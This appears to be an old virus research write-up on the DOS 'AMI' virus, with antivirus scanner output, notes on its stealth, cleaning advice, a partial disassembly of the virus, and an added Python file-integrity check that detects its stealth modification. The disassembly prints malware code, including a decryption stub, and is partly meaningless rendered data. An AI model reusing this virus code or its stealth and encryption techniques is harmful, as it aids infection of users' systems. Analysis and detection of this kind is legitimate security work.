Distributed By Amateur Virus Creation & Research Group (AVCR)
Researched By MAS
=============================================================================
Name: The AMI Virus
=============================================================================
Alias: NONE
=============================================================================
Type of Code: Unknown, but probably memory resident.
=============================================================================
Antivirus Detection:

(1) ThunderByte Anti Virus (TBAV) reported AMI.COM as:
    "probably infected by an unknown virus.
    No checksum / recovery information (Anti-Vir.Dat) available.
    Suspicious file access. Might be able to infect a file.
    Suspicious Memory Allocation. The program uses a non-standard way to
    search for, and/or allocate memory.
    Found a code decryption routine or debugger trap. This is common for
    viruses but also for some copy-protected software.
    The program traps the loading of software. Might be a virus that
    intercepts program load to infect the software.
    Memory resident code. The program might stay resident in memory.
    Garbage instructions. Contains code that seems to have no purpose other
    than encryption or avoiding recognition by virus scanners.
    Undocumented interrupt/DOS call. The program might be just tricky but
    can also be a virus using a non-standard way to detect itself.
    EXE/COM determination. The program tries to check whether a file is a
    COM or EXE file. Viruses need to do this to infect a program.
    Found code that can be used to overwrite/move a program in memory.
    Found instructions which require a 80186 processor or above.
    Encountered instructions which are not likely to be generated by an
    assembler, but by some code generator like a polymorphic virus."

(2) Frisk Software's F-Protect (F-PROT) reported AMI.COM as:
    "C:\AMI\AMI.COM seems to be infected with a virus. Please contact Frisk
    Software International to check if this is a known false alarm or send
    us a copy for analysis."

(3) McAfee Software's Anti Virus (SCAN.EXE) did not detect the AMI virus.

(4) Microsoft Anti Virus (MSAV.EXE) did not detect the AMI virus.
=============================================================================
Execution Results:

This virus is very stealthy: no file changes in size, date or time stamp,
and the memory size does not change. The virus's size, date and time before
execution were:

    NAME        SIZE    DATE        TIME
    AMI.COM     1703    12-16-93    2:40p

After execution they remained unchanged. The only noticeable difference
between before and after execution is the change in its code. Below is a
comparison of the AMI virus before and after execution; in each pair the
top line is before execution and the bottom line is after execution.
_____________________________________________________________________________
; FILE CREATED BY FILE COMPARE,
; DEVELOPED BY:
; MICRO PROFESSOR SOFTWARE,
; ALONG WITH AMATEUR VIRUS CREATION & RESEARCH GROUP.
;----------------------------------------------------------------------------
mov SI,Word Ptr var1_100 ; [602D:0100] = 0
mov SI,Word Ptr var1_100 ; [6342:0100] = 0
;----------------------------------------------------------------------------
xor Word Ptr var1_100,SI ; [602D:0100] = 0
xor Word Ptr var1_100,SI ; [6342:0100] = 0
;----------------------------------------------------------------------------
add DL,Byte Ptr var1_2ee ; [602D:02EE] = 0F27Fh
add DL,Byte Ptr var1_2ee ; [6342:02EE] = 0F27Fh
;----------------------------------------------------------------------------
mov AL,Byte Ptr DS:data_8ee2; [602D:8EE2] = 0
mov AL,Byte Ptr DS:data_8ee2; [6342:8EE2] = 6399h
;----------------------------------------------------------------------------
mov AL,Byte Ptr DS:data_792e; [602D:792E] = 0
mov AL,Byte Ptr DS:data_792e; [6342:792E] = 69A9h
;----------------------------------------------------------------------------
sbb Byte Ptr DS:data_461f,BL; [602D:461F] = 0 Subtract with borrow
sbb Byte Ptr DS:data_461f,BL; [6342:461F] = 1A1Ah Subtract with borrow
;----------------------------------------------------------------------------
mov AX,Word Ptr DS:data_5f12; [602D:5F12] = 0
mov AX,Word Ptr DS:data_5f12; [6342:5F12] = 53F8h
;----------------------------------------------------------------------------
db 16h, 0A7h, 58h, 63h
db 16h, 0A7h
;----------------------------------------------------------------------------
CODE_SEG_1 ends
var1_7a5 db 58h, 63h
;----------------------------------------------------------------------------
CODE_SEG_1 ends
;----------------------------------------------------------------------------
end start
;----------------------------------------------------------------------------
end start
;----------------------------------------------------------------------------
; END OF FIRST FILE, EXTRA CODE IS FROM SECOND FILE
=============================================================================
Cleaning Recommendations: Remove from memory and delete infected files.
=============================================================================
Researcher's Notes: The AMI virus is very stealthy, for there is no way,
other than a virus detector, to notice the virus. When the virus is first
run there is no way to realize that it has been run, for there is no
character displayed, speaker noise, etc.
=============================================================================
-----------------------------------------------------------------------------
Disassembly of the AMI Virus BEFORE Execution
-----------------------------------------------------------------------------
        PAGE 60,132

data_10be = 10BEh
data_16d6 = 16D6h
data_2041 = 2041h
data_2b9f = 2B9Fh
data_2ee0 = 2EE0h
data_461f = 461Fh
data_50ee = 50EEh
data_5d91 = 5D91h
data_5f12 = 5F12h
data_681b = 681Bh
data_7162 = 7162h
data_732e = 732Eh
data_7606 = 7606h
data_792e = 792Eh
data_8ee2 = 8EE2h
data_a1ed = 0A1EDh
data_aea5 = 0AEA5h
data_b400 = 0B400h
data_d8db = 0D8DBh
data_ee10 = 0EE10h
data_eeb8 = 0EEB8h
data_faa6 = 0FAA6h

;---------- CODE_SEG_1 -------------------------------------------------------
CODE_SEG_1 segment para public
        assume CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1
        org 100h
;-----------------------------------------------------------------------------
;
;  ENTRY POINT
;
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
;
;  PROCEDURE proc_start
;
;-----------------------------------------------------------------------------
proc_start proc far
start:                                  ; N-Ref=0
        add Byte Ptr [BX+SI],AL
        add DL,BH
        nop                             ; No operation
        nop                             ; No operation
        call near ptr proc_2
proc_start endp
;-----------------------------------------------------------------------------
;
;  PROCEDURE proc_2
;
;-----------------------------------------------------------------------------
proc_2 proc far
        pop BX
        sub BX,offset var1_131
        mov SI,Word Ptr var1_100        ; [602D:0100] = 0
        xor Word Ptr var1_100,SI        ; [602D:0100] = 0
        lea DI,Word Ptr var1_14d[BX]    ; Load effective address
        mov SI,682h
        xor Word Ptr [DI],DI
        xor Word Ptr [DI],SI
        inc DI
        dec SI
        jne loc_notfound                ; Jump if not equal ( != )
        aaa                             ; ASCII adjust for addition
        xor Byte Ptr [BP+DI+1Fh],CL
        dw 50C0h, 0C951h
var1_12d db 'XPP'
        db 8Dh
var1_131 db '`@@@'
        db 13h, 0BFh, 40h, 0A0h, 4Ch, 53h
        db 0C3h, 57h, 15h, 44h, 18h
var1_140 db '" '
        db 0
var1_144 db 20h, 9, 3Ah, 0DBh, 7Eh, 79h
        db 14h, 0CAh, 16h
var1_14d dw 1110h, 10h, 0E9h
        db 5 dup (0)
        dw 1810h
        db 4 dup (10h)
        db 32h, 11h, 3, 26h, 3
var1_163 db '& ! '
        db 0Ch, 0BFh
        db ']PPPPB@A@@TTTT'
        db 0B8h, 50h, 50h, 0Bh, 0D1h, 0BBh
        db 0F3h, 51h, 8Eh, 2Ch, 2Fh, 0F4h
        db 0A1h, 8Eh, 29h, 27h, 0C6h, 91h
        db 0BEh, 1Bh, 17h, 0C8h, 91h, 33h
        db 80h, 81h, 0AEh, 0Ah, 7, 0DAh
        db 81h, 22h, 92h, 91h, 0C3h, 24h
        db 0A0h, 5Dh, 0B1h, 0CBh, 9Ch, 0A2h
        db 0D2h, 0B1h, 18h, 5Fh, 0EBh, 93h
        db 0AFh, 60h, 0A5h, 9Eh, 72h, 6Eh
        db 1Bh, 7, 16h
var1_1b1 db '6L1U'
        db 0B8h
var1_1b6 db ']D}'
        db 0D8h, 0D4h, 5, 52h, 7Dh, 0ACh
        db 0FCh
var1_1c0 db 71h, 22h, 70h
loc_1:                                  ; N-Ref=0
        wait                            ; Wait for interrupt
        add DL,Byte Ptr var1_2ee        ; [602D:02EE] = 0F27Fh
        cbw                             ; Convert byte to word
        ror Byte Ptr [BX+SI+3Dh],1      ; Rotate right
        call far ptr proc_1
        pop Word Ptr var1_260[SI]
        mov BX,0FCF5h
        and CH,AH
        adc AX,9D0Dh                    ; ADD with carry
        retf                            ; Return FAR
proc_2 endp
CODE_SEG_1 ends
        end start
=============================================================================
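The execution-results section notes that AMI leaves a host's size, date and time untouched, so a baseline that records only those fields cannot see the infection. As an added example (not part of the AVCR write-up), this Python integrity check records a content hash alongside them and flags a file whose bytes changed while size and timestamp stayed the same; the file name, byte contents and timestamp in the demo are constructed.

```python
import hashlib
import os
import tempfile
from dataclasses import dataclass


@dataclass(frozen=True)
class Baseline:
    size: int
    mtime: int     # whole seconds, the granularity a DOS-style date/time check sees
    sha256: str


def fingerprint(path):
    """Record what a size/date scan sees (size, mtime) plus a content hash."""
    st = os.stat(path)
    with open(path, "rb") as fh:
        digest = hashlib.sha256(fh.read()).hexdigest()
    return Baseline(st.st_size, int(st.st_mtime), digest)


def classify(before, after):
    """Compare two fingerprints of the same file taken at different times."""
    if before == after:
        return "unchanged"
    if before.size == after.size and before.mtime == after.mtime:
        # Size and timestamp look untouched but the bytes differ: the AMI
        # pattern from the write-up, which a size/date-only scan misses.
        return "stealth-modified"
    return "modified"


def demo():
    """Constructed scenario (filler bytes, not virus code): a 1703-byte file,
    the size the write-up lists for AMI.COM, rewritten in place at the same
    length with the original timestamp restored afterwards."""
    path = os.path.join(tempfile.mkdtemp(), "AMI.COM")
    body = b"\x90" * 1703                       # constructed filler content
    fixed_time = 756_000_000                    # constructed whole-second timestamp
    with open(path, "wb") as fh:
        fh.write(body)
    os.utime(path, (fixed_time, fixed_time))
    before = fingerprint(path)
    # Change a few bytes without changing the length, then put the timestamp back.
    changed = body[:-4] + b"\x00\x01\x02\x03"
    with open(path, "wb") as fh:
        fh.write(changed)
    os.utime(path, (fixed_time, fixed_time))
    after = fingerprint(path)
    return classify(before, before), classify(before, after)
```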